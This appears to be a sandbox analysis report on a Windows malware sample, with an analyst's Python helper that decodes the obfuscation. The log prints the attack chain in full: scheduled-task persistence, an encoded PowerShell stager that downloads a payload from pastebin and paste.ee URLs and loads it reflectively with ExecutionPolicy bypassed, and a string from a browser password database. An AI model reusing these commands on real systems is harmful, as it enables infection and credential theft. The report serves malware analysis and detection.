                  Source: iexpress.exe, 0000000C.00000002.2227220889.0000000003195000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.00000000031B6000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.00000000031E4000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.00000000031C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
                  Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\user\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
                  Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = '[obfuscated base64 payload omitted]'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exe | Process created: C:\Windows\SysWOW64\iexpress.exe "C:\Windows\SysWOW64\iexpress.exe"
                  Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Windows\SysWOW64\iexpress.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\user\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?ZgBH?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exe Process created: C:\Windows\SysWOW64\iexpress.exe "C:\Windows\SysWOW64\iexpress.exe"
Source: C:\Windows\SysWOW64\iexpress.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
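The two PowerShell command lines above carry the whole staging chain in the clear once their encodings are undone: the wscript.exe child is Base64(UTF-16LE) text with every 'A' swapped for '?', and the decoded stager fetches a Base64 blob in which 'A' has been swapped for the marker '$$$$', reverses a paste.ee URL character by character, and hands everything to a .NET method via AppDomain.CurrentDomain.Load. The script below is an added analyst helper, not part of the Joe Sandbox report or of the sample: it decodes the first 368 characters of the encoded command line exactly as printed in the report, extracts the indicators from the stager text quoted from the report, and undoes the '$$$$' substitution on a payload blob that is constructed here because dll02.txt itself is not on the page.

```python
"""Decode the obfuscation layers visible in the PowerShell process creations
above and pull the indicators out of them.

Added example; not code from the sandbox report or from the sample. The
encoded prefix and the stager text are copied from the report's command
lines; the payload blob is constructed here because dll02.txt is not on the
page.
"""
import base64
import re

# First 368 characters of the wscript.exe -> powershell.exe command line
# ($IuJUJJZz = '...'): Base64 of UTF-16LE text in which every 'A' has been
# replaced by '?'. The report truncates the line before the code that
# swaps the 'A's back and decodes, so that step is reproduced here.
ENCODED_PREFIX = (
    "WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?"
    "TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?"
    "bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?"
    "eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?"
    "RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?"
    "LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?"
)

# The decoded second stage as printed in the powershell.exe -> powershell.exe
# entry of the report (outer double quotes removed).
STAGER = (
    r"[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;"
    r"$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');"
    r"$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;"
    r"$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;"
    r"$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;"
    r"$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;"
    r"$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;"
    r"$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;"
    r"$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;"
    r"$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , "
    r"''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;"
    r"$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;"
    r"powershell -ExecutionPolicy Bypass -File $VBWWz ;"
)


def decode_encoded_command(obfuscated: str) -> str:
    """Layer 1: restore 'A', Base64-decode, interpret as UTF-16LE."""
    b64 = obfuscated.replace("?", "A")
    b64 += "=" * (-len(b64) % 4)            # the report truncates the blob
    raw = base64.b64decode(b64)
    raw = raw[: len(raw) - len(raw) % 2]     # drop a dangling half code unit
    return raw.decode("utf-16-le", errors="replace")


def decode_payload_blob(blob: str) -> bytes:
    """Layer 2: undo the '$$$$' -> 'A' marker substitution and Base64-decode,
    which is what the generated dll03.ps1 does before AppDomain.Load()."""
    return base64.b64decode(blob.replace("$$$$", "A"))


def is_pe(data: bytes) -> bool:
    return data[:2] == b"MZ"


URL_RE = re.compile(r"https?://[^\s'\"]+")
REVERSED_URL_RE = re.compile(r"'([^']*//:s?ptth)'")   # 'http(s)://' spelled backwards
TEMP_RE = re.compile(r"'(dll\d+\.(?:txt|ps1))'")
TYPE_RE = re.compile(r"GetType\(\s*'+([\w.]+)'+\s*\)")
METHOD_RE = re.compile(r"ethod\(\s*'+(\w+)'+\s*\)\.Invoke")


def _first(pattern: re.Pattern, text: str):
    m = pattern.search(text)
    return m.group(1) if m else None


def extract_iocs(stager: str) -> dict:
    """Direct URLs, reversed URLs (read back to front), temp artifacts and the
    .NET entry point that the loader reflects into."""
    return {
        "urls": sorted(set(URL_RE.findall(stager))),
        "reversed_urls": [s[::-1] for s in REVERSED_URL_RE.findall(stager)],
        "temp_files": sorted(set(TEMP_RE.findall(stager))),
        "dotnet_type": _first(TYPE_RE, stager),
        "dotnet_method": _first(METHOD_RE, stager),
    }


# Constructed stand-in for dll02.txt: a fake PE header encoded the way the
# real file is consumed (Base64 with every 'A' replaced by '$$$$').
SAMPLE_BLOB = (
    base64.b64encode(b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00")
    .decode()
    .replace("A", "$$$$")
)

if __name__ == "__main__":
    print(decode_encoded_command(ENCODED_PREFIX))
    for key, value in extract_iocs(STAGER).items():
        print(f"{key}: {value}")
    print("constructed payload is PE:", is_pe(decode_payload_blob(SAMPLE_BLOB)))
```

Running it prints the decoded head of the encoded command (the same TLS 1.2 setup and pastebin URL as the clear-text stager), the pastebin URL, the paste.ee URL recovered from the reversed argument, the three temp file names and the MisericordiosoAmen.Class1 / MsqBIbY entry point. The same regexes work as hunting logic over PowerShell ScriptBlock logs (Event ID 4104), where the reversed-URL and '$$$$'-marker patterns are far rarer than the pastebin URL alone.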
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
